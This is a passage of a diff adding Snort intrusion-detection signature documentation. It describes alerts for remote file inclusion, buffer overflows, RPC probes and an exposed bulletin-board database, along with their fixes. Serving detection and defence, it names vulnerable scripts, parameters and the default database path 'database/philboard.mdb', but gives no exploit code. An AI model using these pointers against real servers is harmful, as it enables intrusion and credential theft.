+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1165.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1165
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1608.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1608
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2135.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2135
+
+--
+Summary:
+This event is generated when a remote user attempts to access philboard.mdb on a web server port on an internal server. This may indicate an attempt to exploit a vulnerability in the default installation of Philboard bulletin board software, where the Philboard Access database is accessible to the Internet.
+
+--
+Impact:
+Information gathering, possible administrative access to the bulletin board.
+
+--
+Detailed Information:
+By default, Philboard installs the Access database file to database/philboard.mdb on the web server. Without authentication, an attacker can download this file to access Philboard bulletin board user names, passwords, and message archives.
+
+--
+Affected Systems:
+Any server running Philboard 1.x.
+
+--
+Attack Scenarios:
+An attacker can download the Philboard database, which will allow them to access Philboard user names, passwords, and message archives.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Move philboard.mdb to an inaccessible location and/or add security permissions to the directory in which it resides.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Secunia
+http://www.secunia.com/advisories/8898/
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000397.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000397
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "login.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "login.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000707.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000707
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "inc_adminfoot.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "inc_adminfoot.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3433.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3433
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2419.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2419
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1753.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1753
+
+--
+Summary:
+This event is generated when an attempt is made to access the as_web.exe component associated with the askSam Web Publisher software.
+
+--
+Impact:
+Cross-site scripting.  This may allow execution of arbitrary commands on a victim host that visits the vulnerable server.
+
+--
+Detailed Information:
+
+askSam Web Publisher is a product that allows the creation and publication of documents and databases on the Internet.  A vulnerability exists in the as_web.exe or as_web4.exe component that may allow cross-site scripting because of a failure to filter script and HTML when error messages are returned.  This may allow an attacker to execute arbitrary code on the victim host that visits the vulnerable server.
+
+--
+Affected Systems:
+askSam Web Publisher 4.0
+
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in vulnerable askSam input fields that use as_web.exe or as_web4.exe. The may allow execution of arbitrary code on a victim host that visits the vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable scripting language support in your browser and e-mail client software to prevent becoming a victim host.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4670
+
+--
--- /dev/null
+++ b/doc/signatures/2222.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2222
+
+--
+Summary:
+This event is generated when an attempt is made to access nph-exploitscanget.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting or policy bypass vulnerability in Exploit Labs Wood's Infinity Scan EZ 3.69 or The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta.
+
+--
+Impact:
+At the minimum, a bypass of scanning policies which may lead to a future compromise of the server. At the maximum, remote execution of arbitrary code on a client machine.
+
+--
+Detailed Information:
+The Exploit Labs Wood's Infinity Scan EZ 3.69 and The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta Internet vulnerability scanners contain multiple vulnerabilities. One vulnerability is the bypassing of scanning policies configured by the software, which may enable an attacker to scan systems that have been configured to disallow scans. In addition, these scanners contain cross-site scripting vulnerabilities that allow an attacker to craft a URL that, when activated by a legitimate user, executes malicious code on the user's computer with the security context of the server that is hosting the scanner software.
+
+--
+Affected Systems:
+Any system running Exploit Labs Wood's Infinity Scan EZ 3.69 or The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta, or any user who activates a specially-crafted hyperlink to the system.
+
+--
+Attack Scenarios:
+An attacker crafts a hyperlink to a server running vulnerable scanner software that contains malicious code. When an unsuspecting user activates the hyperlink, arbitrary code may be run on the user's computer with the security context of the scanner server.
+
+--
+Ease of Attack:
+Simple. An exploit exists for the cross-site scripting vulnerability; no exploit is required for the policy bypass vulnerability.
+
+--
+False Positives:
+If a legitimate remote user accesses nph-exploitscanget.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if these vulnerabilities have been patched or fixed in later versions. Contact the vendor for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1959.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1959
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nfsd is using.  Attackers can also learn what versions of the nfsd protocol are accepted by nfsd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nfsd run.  The nfsd RPC service starts the Network File System (NFS) server daemon that handles file system requests from clients. Once a client mounts an NFS file system, the nfsd daemon handles access to the mount point and associated directories.  Several vulnerabilities are associated with nfsd.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nfsd runs.  This may be a precursor to accessing nfsd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nfsd, not probes of the nfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nfsd service itself. An attacker may attempt to go directly to the nfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2790.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2790
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure publish_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3020.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3020
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2785.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2785
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure execute_ddl
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/441.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+
+Sid:
+441
+
+--
+
+Summary:
+This event is generated when an ICMP Router Advertisement message is found on the network.
+
+--
+
+Impact:
+
+--
+
+Detailed Information:
+Routers may use ICMP protocol 9 to advertise their information and presence on a network. Clients normally recieve this information from DNS if they use DHCP. Clients with statically assigned addresses do not need this information from an external source.
+
+It may be possible for an attacker to craft a packet of this type in such a way as to change the routing information on a DHCP enabled client.
+
+--
+
+Affected Systems:
+	Microsoft Windows 98
+	Sun Solaris 2.6, Sun OS 5.  
+
+--
+
+Attack Scenarios:
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+
+--
+
+False Positives:
+Legitimate uses of ICMP type 9 messages are common.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 9 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1646.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1646
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2695.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2695
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure aq_table_defn_update
+. This procedure is included in
+sys.dbms_aq_import_internal.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/323.txt
@@ -0,0 +1,59 @@
+Rule:   
+
+--
+Sid: 323
+
+-- 
+
+Summary: 
+This is an intelligence gathering activity.
+
+-- 
+
+Impact: 
+The attacker may obtain detailed information about the administrative super user account.
+
+--
+Detailed Information:
+This event is generated when an attempt to access information about the administrative account "root" on a UNIX system is made via the finger service. 
+
+The information that can be collected includes time and source address of the last login and/or current login sessions, type of shell, path to home directory, mail forwarding address (often reflecting the name of the person administrering the system) and the time when "root" email was last read. This information can be used in planning further attacks against the host.
+
+--
+
+Attack Scenarios: 
+The attacker learns that "root" has not logged in for a long time. He hypothesizes that the system is not often used and thus not likely to be patched or secured and may therefore, be vulnerable to a number of other attacks.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS376
+
+--
--- /dev/null
+++ b/doc/signatures/425.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+425
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Bad Length datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated with the datagram was truncated before it reached its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  An ICMP Parameter Problem Bad Length datagram indicates that the datagram was truncated before it reached its final destination.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 2 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000439.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000439
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Claroline" application running on a webserver. Access to the file "postnuke.inc.php" using a remote file being passed as the "includepath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "includepath" parameter in the "postnuke.inc.php" script used by the "Claroline" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Claroline
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000337.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000337
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "defaults_setup.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "defaults_setup.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
